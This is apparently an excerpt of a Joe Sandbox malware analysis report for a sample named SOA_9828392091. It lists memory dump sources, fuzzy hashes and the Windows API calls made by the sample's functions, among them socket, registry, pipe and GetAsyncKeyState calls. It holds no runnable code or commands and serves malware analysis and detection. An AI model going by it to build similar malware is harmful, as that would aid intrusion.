                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 1951874230-3916222277
                                      • Opcode ID: a7c2962b2c614982833b296aa266218a4336df72d539a585b7254550f7c245ff
                                      • Instruction ID: a60a2a9701555ba4ad25174e54b5b9cfc1960d568beb0b2134029b88d600a2f5
                                      • Opcode Fuzzy Hash: a7c2962b2c614982833b296aa266218a4336df72d539a585b7254550f7c245ff
                                      • Instruction Fuzzy Hash: FA21C2B1500209BFEB11AF64CCC4FBFBAECEF88758F10851AF109E2250EA648D059771
                                      APIs
                                        • Part of subcall function 0094D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                        • Part of subcall function 0094D17C: GetStockObject.GDI32(00000011), ref: 0094D1CE
                                        • Part of subcall function 0094D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0099915C
                                      • LoadLibraryW.KERNEL32(?), ref: 00999163
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00999178
                                      • DestroyWindow.USER32(?), ref: 00999180
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: 4ab514d128dfba11de6df5101bcedd4eb2a68822fd714cf76810aa6c21536709
                                      • Instruction ID: 91ff46736800e81184d262bd27539edf3e8eceaf66c565175359ee23c9783a91
                                      • Opcode Fuzzy Hash: 4ab514d128dfba11de6df5101bcedd4eb2a68822fd714cf76810aa6c21536709
                                      • Instruction Fuzzy Hash: 58218B71218206BBEF204E6D9C89FBA37ADFB9A368F10061DF91492190D732DC51A760
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00979588
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009795B9
                                      • GetStdHandle.KERNEL32(0000000C), ref: 009795CB
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00979605
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 3358839f4c02029e6633d95b6986478cbe7eaa8d46c2fb7e60c44b44f6c061f9
                                      • Instruction ID: aa7ad50f372790b1e4b1c7dc96496824ad5f527c9731c7ac6d201c4c21ecf6e7
                                      • Opcode Fuzzy Hash: 3358839f4c02029e6633d95b6986478cbe7eaa8d46c2fb7e60c44b44f6c061f9
                                      • Instruction Fuzzy Hash: F6215172600216ABDB219F29DC45A9A7BA8EF85724F208A19FDA9D72D0D770D940DB10
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00979653
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00979683
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00979694
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009796CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 16fc6246eb3665f62470612c76bddc87f5992647141dc68d64dc50ba66d0388c
                                      • Instruction ID: 7d6827645aeb3e61eff86fd4fbef36139a636d15a088a1afaa8e0415356cd94a
                                      • Opcode Fuzzy Hash: 16fc6246eb3665f62470612c76bddc87f5992647141dc68d64dc50ba66d0388c
                                      • Instruction Fuzzy Hash: 2A214F72600206ABDB209F699C45E9A77ECEF95734F208B19F9A5E72D0E7709841CB50
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097DB0A
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0097DB5E
                                      • __swprintf.LIBCMT ref: 0097DB77
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,009CDC00), ref: 0097DBB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      • Opcode ID: da08d6ccf7c2fba148e5c499bb429c3d74d420cd485ba8b3e7da08c0f2f90f81
                                      • Instruction ID: fdc41cb609847e51f0402e9a3539503efce7b56b7072f8d72225a0d44a8a66f7
                                      • Opcode Fuzzy Hash: da08d6ccf7c2fba148e5c499bb429c3d74d420cd485ba8b3e7da08c0f2f90f81
                                      • Instruction Fuzzy Hash: A0218375A00108AFCB10EF65C985EAEB7B8EF88714F104069F909E7251DB70EA01DF61
                                      APIs
                                        • Part of subcall function 0096C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0096C84A
                                        • Part of subcall function 0096C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0096C85D
                                        • Part of subcall function 0096C82D: GetCurrentThreadId.KERNEL32 ref: 0096C864
                                        • Part of subcall function 0096C82D: AttachThreadInput.USER32(00000000), ref: 0096C86B
                                      • GetFocus.USER32 ref: 0096CA05
                                        • Part of subcall function 0096C876: GetParent.USER32(?), ref: 0096C884
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0096CA4E
                                      • EnumChildWindows.USER32(?,0096CAC4), ref: 0096CA76
                                      • __swprintf.LIBCMT ref: 0096CA90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                      • String ID: %s%d
                                      • API String ID: 3187004680-1110647743
                                      • Opcode ID: 32d1ea6ff37a1acaa4d5e2e2b398ad79cd8519615f5d8942a8c63b623ae431a9
                                      • Instruction ID: 366e3c515019461a8e0d2f56f2bcd63ef0e438c9ea28449e8b54c32eb83a27ca
                                      • Opcode Fuzzy Hash: 32d1ea6ff37a1acaa4d5e2e2b398ad79cd8519615f5d8942a8c63b623ae431a9
                                      • Instruction Fuzzy Hash: 0B1184B1600209BBCB11BFA08C85FF9376CAF84714F008066FE58AA182DB749545DB70
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009919F3
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00991A26
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00991B49
                                      • CloseHandle.KERNEL32(?), ref: 00991BBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 6d0210960d073a867aad0d895f51da4ad5c493b4abe5713ee0ca60cd863be10b
                                      • Instruction ID: c25570b38afe71ea37c86e74e73a680d0761c868ec996f68bf17b5d79c4da118
                                      • Opcode Fuzzy Hash: 6d0210960d073a867aad0d895f51da4ad5c493b4abe5713ee0ca60cd863be10b
                                      • Instruction Fuzzy Hash: 06817371A00205ABDF14DF68C886FADBBE5FF48720F148459F905AF382E7B5A941CB90
                                      APIs
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0099E1D5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0099E20D
                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 0099E248
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0099E269
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0099E281
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                      • String ID:
                                      • API String ID: 3188977179-0
                                      • Opcode ID: 36bb5d6a9cf2f7c425a01b45e783cbdbba0735140b55d60d8a0f3fbb32aaf362
                                      • Instruction ID: 1ebeac464a7142f6cf2b6c171c6e6503d1e7ac66c54a159ebeb44d67848291f2
                                      • Opcode Fuzzy Hash: 36bb5d6a9cf2f7c425a01b45e783cbdbba0735140b55d60d8a0f3fbb32aaf362
                                      • Instruction Fuzzy Hash: 14617C38A08248EFDF35CF5CCC95FBA77BAAB89310F184459F959972A1C771A940CB50
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00971CB4
                                      • VariantClear.OLEAUT32(00000013), ref: 00971D26
                                      • VariantClear.OLEAUT32(00000000), ref: 00971D81
                                      • VariantClear.OLEAUT32(?), ref: 00971DF8
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00971E26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: f03a46f5a956336b8b1098b4a87ee62aa7f9b2813630b6c2738b8952ae27b60a
                                      • Instruction ID: 566282b809ef8205fc063742cdbf70ad2c336978dad324db532a93f987064a51
                                      • Opcode Fuzzy Hash: f03a46f5a956336b8b1098b4a87ee62aa7f9b2813630b6c2738b8952ae27b60a
                                      • Instruction Fuzzy Hash: 6E5149B5A00209AFDB24CF58C884EAAB7B9FF4C314B158559ED59DB350E730EA51CFA0
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009906EE
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0099077D
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0099079B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 009907E1
                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 009907FB
                                        • Part of subcall function 0094E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0097A574,?,?,00000000,00000008), ref: 0094E675
                                        • Part of subcall function 0094E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0097A574,?,?,00000000,00000008), ref: 0094E699
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: e42c00a48ce8c195829106eecfae5c64ad3d7a41ec44e2cef2c36da3fe3864ed
                                      • Instruction ID: 4f70edf68e98c3382ae31a210c5d898769aa6d02f02e1c56e1ae9e50a60b9157
                                      • Opcode Fuzzy Hash: e42c00a48ce8c195829106eecfae5c64ad3d7a41ec44e2cef2c36da3fe3864ed
                                      • Instruction Fuzzy Hash: 3C512975A00209DFCF04EFA8D895AADB7B9BF88320F048055E915AB351DB34ED45CF50
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00992EEF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00992F2E
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00992F75
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00992FA1
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00992FAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 3740051246-0
                                      • Opcode ID: 826abc39a27740eaf45df863c67b7b600887d47de7c52bf4d61a6fef03c0413e
                                      • Instruction ID: 677308a955e8a090ad07e57b2e396b147a68eb0afc10bd5c4e1f248723b4b0b1
                                      • Opcode Fuzzy Hash: 826abc39a27740eaf45df863c67b7b600887d47de7c52bf4d61a6fef03c0413e
                                      • Instruction Fuzzy Hash: C4511972209204AFDB04EF58C891F6AB7F9FF88314F04891DF59697291DB70E905DB52
                                      APIs
                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00988E7C
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988E89
                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00988EAD
                                      • _strlen.LIBCMT ref: 00988EF7
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988F6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_strlenselect
                                      • String ID:
                                      • API String ID: 2217125717-0
                                      • Opcode ID: 18ac66a31989fa1ecedbb25c3cf11138d8a6a6359d573fce0ccf7cb7ef3d817c
                                      • Instruction ID: ffcaf560ca9ef1eeb2d2e9609ea948ee523f214681385d58e4201655610263b2
                                      • Opcode Fuzzy Hash: 18ac66a31989fa1ecedbb25c3cf11138d8a6a6359d573fce0ccf7cb7ef3d817c
                                      • Instruction Fuzzy Hash: 59417071504104ABCB14FBA4DD95FAEB7B9AF88314F504669F51AA7291EF30AE40CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98cd1755a2cfbafa9d9d92dcdfbe6cadd440172ef3d34beca0c16ea030f5fe00
                                      • Instruction ID: 2823d84270e6b757a1f726ecdd0ad3c59f441468559a384ee9e291620d6bc0fe
                                      • Opcode Fuzzy Hash: 98cd1755a2cfbafa9d9d92dcdfbe6cadd440172ef3d34beca0c16ea030f5fe00
                                      • Instruction Fuzzy Hash: 5F41C3B9905208AFDF20DF6CCC44FA9BB6DEB09320F150265F95AA72E1D734AD41DA90
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009812B4
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009812DD
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0098131C
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00981341
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00981349
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: ec126a70702c059bbea06d5f253028d682e9a17b038cd4679bf0453587b91174
                                      • Instruction ID: ff02b748827d6a96833e3fedad8081d29e5ce31f6fca6dcc36e7f0b637fcb04a
                                      • Opcode Fuzzy Hash: ec126a70702c059bbea06d5f253028d682e9a17b038cd4679bf0453587b91174
                                      • Instruction Fuzzy Hash: 6A41F975A00105DFCB05EF64C991AAEBBF9FF48314B148099E91AAB361DB31ED01DF51
                                      APIs
                                      • GetCursorPos.USER32(000000FF), ref: 0094B64F
                                      • ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                      • GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                      • GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 2a0d2da8562bac29333dbc6eac637b252a37b19bbaf32275204b3f9370d55329
                                      • Instruction ID: c2199dfaf895967fa9d026d55d54bee7db6819023575e294079efea514225c49
                                      • Opcode Fuzzy Hash: 2a0d2da8562bac29333dbc6eac637b252a37b19bbaf32275204b3f9370d55329
